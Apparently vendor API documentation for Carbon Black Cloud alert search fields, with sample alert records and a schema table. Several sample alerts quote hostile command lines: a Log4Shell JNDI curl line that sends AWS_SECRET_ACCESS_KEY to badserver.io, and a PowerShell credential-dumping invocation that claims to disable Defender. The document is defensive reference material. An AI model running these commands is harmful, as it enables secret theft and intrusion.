Search Fields - Alerts

Version: API v7

The following table lists the fields that can be returned in the response or used for searching with the Carbon Black Cloud using any of

Using the Schema

View the definition of each field, default values, whether it is required, searchable and/or tokenized. You can also see accepted values and routes supported per each field.

Possible Alert Types

Icons indicate the alert types a field is valid for.

  • FACET - These fields can be used for returning most prevalent values.
Note: For fields where the Alert Types Supported column contains no entries, this means this field is available only to MDR customers.

Alert Type Examples

    {
        "org_key":"ABCD1234",
        "alert_url":"defense-dev01.cbdtest.io/alerts?s[c][query_string]=id:ca316d99-a808-3779-8aab-62b2b6d9541c&orgKey=ABCD1234",
        "id":"ca316d99-a808-3779-8aab-62b2b6d9541c",
        "type":"INTRUSION_DETECTION_SYSTEM",
        "backend_timestamp":"2023-02-03T17:27:33.007Z",
        "user_update_timestamp":null,
        "backend_update_timestamp":"2023-02-03T17:27:33.007Z",
        "detection_timestamp":"2023-02-03T17:22:03.945Z",
        "first_event_timestamp":"2023-02-03T17:22:03.945Z",
        "last_event_timestamp":"2023-02-03T17:22:03.945Z",
        "severity":1,
        "reason":"HTTP traffic from asset DEV01-39X-1 matched IDS signature for threat CVE-2021-44228 Exploit",
        "reason_code":"DC68DDD6-4B82-4AAF-9321-B4EBB32F5C2D:B5974D4D-265E-4FAF-8F71-2F76AAD67857",
        "threat_id":"bbe232a02b6c5583786503c25fe9a1d29d6ed39d3a295a6ff5c07f81629d0017",
        "primary_event_id":"21AB6B27-9F72-11ED-A79A-005056A53F17",
        "policy_applied":"NOT_APPLIED",
        "run_state":"RAN",
        "sensor_action":"ALLOW",
        "workflow":{"change_timestamp":"2023-02-03T17:27:33.007Z",
        "changed_by_type":"SYSTEM",
        "changed_by":"ALERT_CREATION",
        "closure_reason":"NO_REASON",
        "status":"OPEN"},
        "determination":{"change_timestamp":"2023-02-03T17:27:33.007Z",
        "value":"NONE",
        "changed_by_type":"SYSTEM",
        "changed_by":"ALERT_CREATION"},
        "tags":null,
        "alert_notes_present":false,
        "threat_notes_present":false,
        "is_updated":false,
        "rule_category_id":"DC68DDD6-4B82-4AAF-9321-B4EBB32F5C2D",
        "rule_id":"B5974D4D-265E-4FAF-8F71-2F76AAD67857",
        "device_id":17482451,
        "device_name":"DEV01-39X-1",
        "device_uem_id":"",
        "device_target_value":"MEDIUM",
        "device_policy":"Standard",
        "device_policy_id":165700,
        "device_os":"WINDOWS",
        "device_os_version":"Windows 10 x64",
        "device_username":"DemoMachine",
        "device_location":"UNKNOWN",
        "device_external_ip":"66.170.99.2",
        "device_internal_ip":"10.203.105.21",
        "mdr_alert":false,
        "mdr_alert_notes_present":false,
        "mdr_threat_notes_present":false,
        "ttps":[],
        "attack_tactic":"TA0001",
        "attack_technique":"T1190",
        "process_guid":"ABCD1234-010ac2d3-00001694-00000000-1d937f40884b9e0",
        "process_pid":5780,
        "process_name":"c:\\windows\\system32\\curl.exe",
        "process_sha256":"d76d08c04dfa434de033ca220456b5b87e6b3f0108667bd61304142c54addbe4",
        "process_md5":"eac53ddafb5cc9e780a7cc086ce7b2b1",
        "process_effective_reputation":"TRUSTED_WHITE_LIST",
        "process_reputation":"TRUSTED_WHITE_LIST",
        "process_cmdline":"curl  -H \"Host: \\${jndi:ldap://\\{env:AWS_SECRET_ACCESS_KEY}.badserver.io}\" http://google.com/testingids",
        "process_username":"DEV01-39X-1\\bit9qa",
        "process_issuer":["Microsoft Windows Production PCA 2011"],
        "process_publisher":["Microsoft Windows"],
        "parent_guid":"ABCD1234-010ac2d3-0000225c-00000000-1d9300e2bb5211a",
        "parent_pid":8796,
        "parent_name":"c:\\windows\\system32\\cmd.exe",
        "parent_sha256":"b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450",
        "parent_md5":"8a2122e8162dbef04694b9c3e0b6cdee",
        "parent_effective_reputation":"TRUSTED_WHITE_LIST",
        "parent_reputation":"TRUSTED_WHITE_LIST",
        "parent_cmdline":"\"C:\\WINDOWS\\system32\\cmd.exe\" ",
        "parent_username":"DEV01-39X-1\\bit9qa",
        "childproc_guid":"",
        "childproc_username":"",
        "childproc_cmdline":"",
        "netconn_remote_port":80,
        "netconn_local_port":49233,
        "netconn_protocol":"",
        "netconn_remote_domain":"google.com",
        "netconn_remote_ip":"142.250.189.174",
        "netconn_local_ip":"10.203.105.21",
        "netconn_remote_ipv4":"142.250.189.174",
        "netconn_local_ipv4":"10.203.105.21",
        "tms_rule_id":"4b98443a-ba0d-4ff5-b99e-e5e70432a214",
        "threat_name":"CVE-2021-44228 Exploit",
        "threat_hunt_id": "0ff0725d-22c0-4b8f-95ea-a798e544e408",
        "threat_hunt_name": "GroutLoader Test"
    }
    
   {
        "org_key":"ABCD1234",
        "alert_url":"defense-dev01.cbdtest.io/alerts?s[c][query_string]=id:f0c7970b-f23c-919e-0cd8-7a38bd373a6f&orgKey=ABCD1234",
        "id":"f0c7970b-f23c-919e-0cd8-7a38bd373a6f",
        "type":"CONTAINER_RUNTIME",
        "backend_timestamp":"2023-02-06T00:13:37.663Z",
        "user_update_timestamp":"2023-04-13T11:55:52.550Z",
        "backend_update_timestamp":"2023-02-06T00:13:37.663Z",
        "detection_timestamp":"2023-02-06T00:10:51.176Z",
        "first_event_timestamp":"2023-02-06T00:09:19.320Z",
        "last_event_timestamp":"2023-02-06T00:09:19.320Z",
        "severity":5,
        "reason":"Detected a connection to a public destination that isn't allowed for this scope",
        "reason_code":"2e5170e7-2665-49d2-829e-f5bdeefe6b06:f8b1637a-dc0c-49bb-bc28-5b48f97e6d58",
        "threat_id":"0811c72d38d40951b4b90dba05638a20669c9f001ea2e65eeb4768f813d6ed0c",
        "primary_event_id":"X0z55sxeTGWPfKuzPkFlCg-61",
        "policy_applied":"NOT_APPLIED",
        "run_state":"RAN",
        "sensor_action":"ALLOW",
        "workflow":{
            "change_timestamp":"2023-04-13T11:55:52.550Z",
            "changed_by_type":"USER",
            "changed_by":"janaw+csr@vmware.com",
            "closure_reason":"NO_REASON",
            "status":"IN_PROGRESS"
        },
        "determination":{
            "change_timestamp":"2023-02-22T21:07:57.955Z",
            "value":"NONE",
            "changed_by_type":"USER",
            "changed_by":"janaw+superadmin2@vmware.com"
        },
        "tags":["の結果"],
        "alert_notes_present":false,
        "threat_notes_present":true,
        "is_updated":false,
        "mdr_alert":false,
        "mdr_alert_notes_present":false,
        "mdr_threat_notes_present":false,
        "netconn_remote_port":443,
        "netconn_local_port":56618,
        "netconn_protocol":"TCP",
        "netconn_remote_domain":"westeurope.monitoring.azure.com",
        "netconn_remote_ip":"20.50.65.82",
        "netconn_local_ip":"10.244.2.22",
        "netconn_remote_ipv4":"20.50.65.82",
        "netconn_local_ipv4":"10.244.2.22",
        "k8s_cluster":"tomer:sensor-aks",
        "k8s_namespace":"kube-system",
        "k8s_kind":"DaemonSet",
        "k8s_workload_name":"ama-logs",
        "k8s_pod_name":"ama-logs-gm5tt",
        "k8s_policy_id":"2e5170e7-2665-49d2-829e-f5bdeefe6b06",
        "k8s_policy":"Big runtime policy",
        "k8s_rule_id":"f8b1637a-dc0c-49bb-bc28-5b48f97e6d58",
        "k8s_rule":"Allowed public destinations",
        "connection_type":"EGRESS",
        "egress_group_id":"",
        "egress_group_name":"",
        "ip_reputation":96,
        "remote_is_private":false
    }
    
    {
        "org_key":"ABCD1234",
        "alert_url":"defense.conferdeploy.net/alerts?s[c][query_string]=id:3d80bd8b-7770-40a7-8d6b-8268fb15c59f&orgKey=ABCD1234",
        "id":"3d80bd8b-7770-40a7-8d6b-8268fb15c59f",
        "type":"WATCHLIST",
        "backend_timestamp":"2023-07-17T17:21:34.063Z",
        "user_update_timestamp":null,
        "backend_update_timestamp":"2023-07-17T17:21:34.063Z",
        "detection_timestamp":"2023-07-17T17:21:13.483Z",
        "first_event_timestamp":"2023-07-17T17:19:00.412Z",
        "last_event_timestamp":"2023-07-17T17:19:00.412Z",
        "severity":10,
        "reason":"Process powershell.exe was detected by the report \"Credential Access - AMSI - Suspect Kerberos Ticket Request Behavior\" in watchlist \"AMSI Threat Intelligence\"",
        "reason_code":"cf4e6de7-4aa8-3188-8034-6a54fdea940c:e17d957d-b504-3462-816c-f182fe1d80ab",
        "threat_id":"CF4E6DE74AA8B188C0346A54FDEA940C",
        "primary_event_id":"VUX7Bu7vTrWwnU8-uSVh1A-0",
        "policy_applied":"NOT_APPLIED",
        "run_state":"RAN",
        "sensor_action":"ALLOW",
        "workflow":{
            "change_timestamp":"2023-07-17T17:21:34.063Z",
            "changed_by_type":"SYSTEM",
            "changed_by":"ALERT_CREATION",
            "closure_reason":"NO_REASON",
            "status":"OPEN"
        },
        "determination":{
            "change_timestamp":"2023-07-17T17:21:34.063Z",
            "value":"NONE",
            "changed_by_type":null,
            "changed_by":null
        },
        "tags":null,
        "alert_notes_present":false,
        "threat_notes_present":false,
        "is_updated":false,
        "device_id":5890528,
        "device_name":"ABT102675",
        "device_uem_id":"596B6C4DD49AEF4AB3713363DDBB1F11",
        "device_target_value":"MEDIUM",
        "device_policy":"default",
        "device_policy_id":6525,
        "device_os":"WINDOWS",
        "device_os_version":"Windows 11 x64",
        "device_username":"DemoMachine",
        "device_location":"UNKNOWN",
        "device_external_ip":"49.206.61.4",
        "device_internal_ip":"192.168.0.104",
        "mdr_alert":false,
        "mdr_alert_notes_present":false,
        "mdr_threat_notes_present":false,
        "report_id":"LrKOC7DtQbm4g8w0UFruQg-b1c1ae83-f66b-4aa3-a496-363e296f4018",
        "report_name":"Credential Access - AMSI - Suspect Kerberos Ticket Request Behavior",
        "report_description":"Service accounts in Windows Active Directory environments have the ability to register under an AD security principle (user or computer) as a (SPN) Service Principal Name. The SPN registration allows for kerberos clients to request a kerberos service ticket associated with the service account SPN. This kerberos TGS is encrypted using the service accounts password. If a weak password is assigned to this service account an attacker can make an out of band request for one of these kerberos service tickets and crack it offline with tools like Jack the Ripper. This detection looks for fileless behaviors related to the out of band kerberos ticket request. If you are responding to this alert you should take immediate action and look at the process that alerted on this behavior as well as the other fileless script loads events.",
        "report_tags":[
            "credentialaccess",
            "t1558",
            "windows",
            "amsi",
            "attack",
            "attackframework"
        ],
        "report_link":"https://attack.mitre.org/techniques/T1558/003/",
        "ioc_id":"b1c1ae83-f66b-4aa3-a496-363e296f4018",
        "ioc_hit":"fileless_scriptload_cmdline:\"System.IdentityModel.Tokens.KerberosRequestorSecurityToken\" OR scriptload_content:\"System.IdentityModel.Tokens.KerberosRequestorSecurityToken\"",
        "watchlists":[{
            "id":"Ci7w5B4URg6HN60hatQMQ",
            "name":"AMSI Threat Intelligence"
        }],
        "process_guid":"ABCD1234-0059e1e0-00003544-00000000-1d9b8db27a4d423",
        "process_pid":13636,
        "process_name":"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
        "process_sha256":"d436e66c0d092508e4b85290815ab375695fa9013c7423a3a27fed4f1acf90bd",
        "process_md5":"0499440c4b0783266183246e384c6657",
        "process_effective_reputation":"TRUSTED_WHITE_LIST",
        "process_reputation":"TRUSTED_WHITE_LIST",
        "process_cmdline":"powershell.exe -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -",
        "process_username":"NT AUTHORITY\\SYSTEM",
        "process_issuer":["Microsoft Windows Production PCA 2011"],
        "process_publisher":["Microsoft Windows"],
        "parent_guid":"ABCD1234-0059e1e0-00002890-00000000-1d9a898aa24acc9",
        "parent_pid":10384,
        "parent_name":"c:\\program files\\unowhy\\hisqool manager\\hisqoolmanager.exe",
        "parent_sha256":"4ab2c4932e01ab8460bd8bff5afb0c76e9e238c10ce47515be40c49f652d0282",
        "parent_md5":"c7e583681f0958d4f5d32afd09d8084b",
        "parent_effective_reputation":"NOT_LISTED",
        "parent_reputation":"NOT_LISTED",
        "parent_cmdline":"\"C:\\Program Files\\Unowhy\\HiSqool Manager\\HiSqoolManager.exe\" ",
        "parent_username":"NT AUTHORITY\\SYSTEM",
        "childproc_guid":"",
        "childproc_username":"",
        "childproc_cmdline":"",
        "ml_classification_final_verdict":"ANOMALOUS",
        "ml_classification_global_prevalence":"MEDIUM",
        "ml_classification_org_prevalence":"LOW"
    }
    
    {
        "org_key":"ABCD1234",
        "alert_url":"defense.conferdeploy.net/alerts?s[c][query_string]=id:411eedfc-8408-2f9e-59f2-a83dfaae0ec1&orgKey=ABCD1234",
        "id":"411eedfc-8408-2f9e-59f2-a83dfaae0ec1",
        "type":"CB_ANALYTICS",
        "backend_timestamp":"2023-07-17T17:16:50.960Z",
        "user_update_timestamp":null,
        "backend_update_timestamp":"2023-07-17T17:29:19.996Z",
        "detection_timestamp":"2023-07-17T17:15:51.708Z",
        "first_event_timestamp":"2023-07-17T17:15:33.396Z",
        "last_event_timestamp":"2023-07-17T17:27:59.192Z",
        "severity":5,
        "reason":"A known virus (HackTool: Powerpuff) was detected running.",
        "reason_code":"T_REP_VIRUS",
        "threat_id":"9e0afc389c1acc43b382b1ba590498d2",
        "primary_event_id":"94953e4524c511ee86284f0541a5184d",
        "policy_applied":"NOT_APPLIED",
        "run_state":"RAN",
        "sensor_action":"ALLOW",
        "workflow":{
            "change_timestamp":"2023-07-17T17:16:50.960Z",
            "changed_by_type":"SYSTEM",
            "changed_by":"ALERT_CREATION",
            "closure_reason":"NO_REASON",
            "status":"OPEN"
        },
        "determination":{
            "change_timestamp":"2023-07-17T17:16:50.960Z",
            "value":"NONE",
            "changed_by_type":null,
            "changed_by":null
        },
        "tags":null,
        "alert_notes_present":false,
        "threat_notes_present":false,
        "is_updated":true,
        "device_id":6948863,
        "device_name":"Kognos-W19-CB-3",
        "device_uem_id":"",
        "device_target_value":"MISSION_CRITICAL",
        "device_policy":"SSQ_Policy",
        "device_policy_id":112221,
        "device_os":"WINDOWS",
        "device_os_version":"Windows Server 2019 x64",
        "device_username":"demouser@demo.org",
        "device_location":"OFFSITE",
        "device_external_ip":"34.234.170.45",
        "device_internal_ip":"10.0.14.120",
        "mdr_alert":false,
        "mdr_alert_notes_present":false,
        "mdr_threat_notes_present":false,
        "ttps":[
            "MALWARE_APP",
            "RUN_MALWARE_APP",
            "MITRE_T1059_CMD_LINE_OR_SCRIPT_INTER",
            "FILELESS",
            "MITRE_T1059_001_POWERSHELL"
        ],
        "attack_tactic":"",
        "attack_technique":"",
        "process_guid":"ABCD1234-006a07ff-00000e10-00000000-1d9b8d24ab16c73",
        "process_pid":3600,
        "process_name":"c:\\users\\administrator\\appdata\\local\\temp\\powerdump.ps1",
        "process_sha256":"3b463c94b52414cfaad61ecdac64ca84eaea1ab4be69f75834aaa7701ab5e7d0",
        "process_md5":"42a80cc2333b612b63a859f17474c9af",
        "process_effective_reputation":"KNOWN_MALWARE",
        "process_reputation":"KNOWN_MALWARE",
        "process_cmdline":"\"powershell.exe\" & {Write-Host \\\"\"STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\\\"\" -fore green\nImport-Module \\\"\"$Env:Temp\\PowerDump.ps1\\\"\"\nInvoke-PowerDump}",
        "process_username":"KOGNOS-W19-CB-3\\Administrator",
        "process_issuer":[],
        "process_publisher":[],
        "parent_guid":"ABCD1234-006a07ff-00000fb8-00000000-1d9b8d2494e29ed",
        "parent_pid":4024,
        "parent_name":"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
        "parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
        "parent_md5":"",
        "parent_effective_reputation":"TRUSTED_WHITE_LIST",
        "parent_reputation":"TRUSTED_WHITE_LIST",
        "parent_cmdline":"",
        "parent_username":"KOGNOS-W19-CB-3\\Administrator",
        "childproc_guid":"ABCD1234-006a07ff-00000000-00000000-19db1ded53e8000",
        "childproc_name":"",
        "childproc_sha256":"",
        "childproc_md5":"",
        "childproc_effective_reputation":"RESOLVING",
        "childproc_username":"KOGNOS-W19-CB-3\\Administrator",
        "childproc_cmdline":""
    }
    

Additional indicators

  • Searchable - Indicates that the field can be used in the criteria, exclusion or query elements of alerts requests e.g. process_name:chrome.exe
  • Searchable Array - Indicates that the field can be used in the criteria, exclusion or query elements of alerts requests and that in criteria and exclusion elements it is an array that may contain multiple values
  • Searchable Time Range - Indicates that the field can be used in the criteria, exclusion or query elements of alerts requests and that in criteria and exclusion elements it is an object with either start and end parameters or a range parameter. See Alerts API - Time Range Filter for more details.
  • Sortable - Indicates that the field can be used in sort request
  • All fields can be specified for inclusion in the Export Alerts results

Searching across both Endpoint Standard and Enterprise EDR data? See below for limitations.

Schema

Note: Additional details and examples can be found in the Carbon Black Cloud console search guide.
Field Name Definition Datatype Alert Types Supported
alert_notes_present Searchable
True if notes are present on the alert ID. False if notes are not present.
Boolean
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
alert_origin Searchable
How the alert was created.
String
MDR, MDR_THREAT_HUNT
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
alert_url Link to the alerts page for this alert. Does not vary by alert type String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
attack_tactic Searchable Array
A tactic from the MITRE ATT&CK framework; defines a reason for an adversary’s action, such as achieving credential access
String CB_ANALYTICS WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
attack_technique Searchable Array
A technique from the MITRE ATT&CK framework; defines an action an adversary takes to accomplish a goal, such as dumping credentials to achieve credential access
String CB_ANALYTICS WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
backend_timestamp
(Use time_range in search requests)
Searchable Time Range
Sortable
Timestamp when the Carbon Black Cloud processed and enabled the alert for searching. Corresponds to the Created column on the Alerts page.

This field is searched by the time_range request field and defaults to the previous two weeks on requests that include this field.
ISO 8601 UTC Date String

Note: This field is not valid in criteria. The top-level parameter time_range must be used.
Uses the Time Range Object
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
backend_update_timestamp Searchable Time Range
Sortable
Timestamp when the Carbon Black Cloud initiated and processed an update to an alert. Corresponds to the Updated column on the Alerts page.
Note that changes made by users do not change this date; those changes are reflected on user_update_timestamp
ISO 8601 UTC Date String

Note: When used as criteria the search is within the period specified by time_range on that request and uses the Time Range Object
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
blocked_effective_reputation Searchable Array
Effective reputation of the blocked file or process; applied by the sensor at the time the block occurred
String

ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED
CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
blocked_md5 Searchable Array
MD5 hash of the child process binary; for any process terminated by the sensor
String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
blocked_name Searchable Array
Tokenized file path of the files blocked by sensor action
String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
blocked_sha256 Searchable Array
SHA-256 hash of the child process binary; for any process terminated by the sensor
String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
childproc_cmdline Searchable Array
Command line for the child process
String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
childproc_effective_reputation Searchable Array
Effective reputation of the child process; applied by the sensor at the time the event occurred
String

ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED
CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
childproc_guid Searchable Array
Unique process identifier assigned to the child process
String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
childproc_md5 Searchable Array
Hash of the child process' binary (Enterprise EDR)
String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
childproc_name Searchable Array
Filesystem path of the child process' binary
String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
childproc_sha256 Searchable Array
Hash of the child process' binary (Endpoint Standard)
String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
childproc_username Searchable Array
User context in which the child process was executed
String CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM
connection_type Searchable Array
Connection Type
String

INTERNAL_INBOUND
INTERNAL_OUTBOUND
INGRESS
EGRESS
CONTAINER_RUNTIME FACET
detection_timestamp Searchable Time Range
Sortable
Timestamp when the alert was first detected. For sensor-sent alerts, this is the time of the event on the sensor. For alerts generated on the backend, this is the time the backend system triggered the alert.
ISO 8601 UTC Date String

Note: When used as criteria the search is within the period specified by time_range on that request and uses the Time Range Object
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
determination User-updatable determination of the alert Nested Response Object:
{
  "determination": {
    "change_timestamp": "<string>",
    "changed_by": "<string>",
    "changed_by_type": "<string>",
    "value": "<string>"
  }
}
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
determination_change_timestamp Searchable Time Range
When the determination was updated.
ISO 8601 UTC Date String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
determination_changed_by User the determination was changed by. String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
determination_changed_by_type Searchable
String

SYSTEM
USER
API
AUTOMATION
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
determination_value Searchable Array
Determination of the alert set by a user
String

NONE
TRUE_POSITIVE
FALSE_POSITIVE
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
device_external_ip Searchable Array
IP address of the endpoint according to the Carbon Black Cloud; can differ from device_internal_ip due to network proxy or NAT; either IPv4 (dotted decimal notation) or IPv6 (proprietary format)
String CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
device_id Searchable Array
ID of devices
Integer
CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
device_internal_ip Searchable Array
IP address of the endpoint reported by the sensor; either IPv4 (dotted decimal notation) or IPv6 (proprietary format)
String CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
device_location Searchable Array
Whether the device was on or off premises when the alert started, based on the current IP address and the device’s registered DNS domain suffix
String

ONSITE
OFFSITE
UNKNOWN
CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
device_name Searchable Array
Device name
String CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
device_os Searchable Array
Device Operating Systems
String

WINDOWS
MAC
LINUX
OTHER
CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
device_os_version Searchable Array
The operating system and version of the endpoint. Requires Windows CBC sensor version 3.5 or later.
String CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
device_policy Searchable Array
Device policy
String CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET
device_policy_id Searchable Array
Device policy id
Integer
CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
device_target_value Searchable Array
Sortable
Target value assigned to the device, set from the policy
String

LOW
MEDIUM
HIGH
MISSION_CRITICAL
CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
device_uem_id Searchable Array
Device correlation with WS1/EUC, required for our Workspace ONE Intelligence integration to function
String CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
device_username Searchable Array
Users or device owners of alerts
String CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
egress_group_id Searchable Array
Unique identifier for the egress group
String CONTAINER_RUNTIME
egress_group_name Searchable Array
Name of the egress group
String CONTAINER_RUNTIME
external_device_friendly_name Searchable Array
Human-readable external device names
String DEVICE_CONTROL FACET
first_event_timestamp Searchable Time Range
Sortable
Timestamp when the first event in the alert occurred
ISO 8601 UTC Date String

Note: When used as criteria the search is within the period specified by time_range on that request and uses the Time Range Object
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
id Searchable Array
Unique IDs of alerts
String CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
ioc_field The field the indicator of comprise (IOC) hit contains String WATCHLIST
ioc_hit IOC field value or IOC query that matches String WATCHLIST
ioc_id Unique identifier of the IOC that generated the watchlist hit String WATCHLIST
ip_reputation Searchable Array
Range of reputations to accept for the remote IP:
0: unknown
1-20: high risk
21-40: suspicious
41-60: moderate
61-80: low risk
81-100: trustworthy

There must be two values in this list. The first is the lower end of the range (inclusive) the second is the upper end of the range (inclusive)
Integer
CONTAINER_RUNTIME
is_updated Set to true if this is an updated copy of the alert initiated by the Carbon Black Cloud backend. User workflow updates, such as adding a note, will generate a new copy of the alert, but is_updated will be set to false. Boolean
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
k8s_cluster Searchable Array
K8s Cluster name
String CONTAINER_RUNTIME FACET
k8s_kind Searchable Array
K8s Workload kind
String CONTAINER_RUNTIME
k8s_namespace Searchable Array
K8s namespace
String CONTAINER_RUNTIME FACET
k8s_pod_name Searchable Array
Name of the pod within a workload
String CONTAINER_RUNTIME
k8s_policy Searchable Array
Name of the K8s policy
String CONTAINER_RUNTIME FACET
k8s_policy_id Searchable Array
Unique identifier for the K8s policy
String CONTAINER_RUNTIME FACET
k8s_rule Searchable Array
Name of the K8s policy rule
String CONTAINER_RUNTIME FACET
k8s_rule_id Searchable Array
Unique identifier for the K8s policy rule
String CONTAINER_RUNTIME FACET
k8s_workload_name Searchable Array
Sortable
K8s Workload Name
String CONTAINER_RUNTIME FACET
last_event_timestamp Searchable Time Range
Sortable
Timestamp when the last event in the alert occurred
ISO 8601 UTC Date String

Note: When used as criteria the search is within the period specified by time_range on that request and uses the Time Range Object
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM
mdr_alert Searchable
Is the alert eligible for review by Carbon Black MDR Analysts?
Boolean
FACET
mdr_alert_notes_present Searchable
Customer visible notes at the alert level that were added by a MDR analyst
Boolean
mdr_determination Mdr updatable classification of the alert Nested Response Object:
{
  "mdr_determination": {
    "change_timestamp": "<string>",
    "value": "<string>"
  }
}
mdr_determination_change_timestamp Searchable Time Range
When the last MDR classification change occurred
ISO 8601 UTC Date String

Note: When used as criteria the search is within the period specified by time_range on that request and uses the Time Range Object
mdr_determination_value Searchable
A record that identifies the whether the alert was determined to represent a likely or unlikely threat.
String

NOT_ENOUGH_INFO
NOT_REVIEWED
NONE
UNLIKELY_THREAT
LIKELY_THREAT
FACET
mdr_threat_notes_present Searchable
Customer visible notes at the threat level that were added by a MDR analyst
Boolean
mdr_workflow MDR-updatable workflow of the alert Nested Response Object:
{
  "mdr_workflow": {
    "change_timestamp": "<string>",
    "status": "<string>",
    "is_assigned": "<boolean>"
  }
}
mdr_workflow_change_timestamp Searchable Time Range
Sortable
When the last MDR status change occurred
ISO 8601 UTC Date String

Note: When used as criteria the search is within the period specified by time_range on that request and uses the Time Range Object
mdr_workflow_is_assigned Searchable
Boolean
mdr_workflow_status Searchable Array
Primary value used to capture status change during MD Analyst’s alert triage
String

UNCLAIMED
IN_PROGRESS
TRIAGE_COMPLETE
ACTION_REQUESTED
PENDING_RESPONSE
RESPONCE_RECEIVED
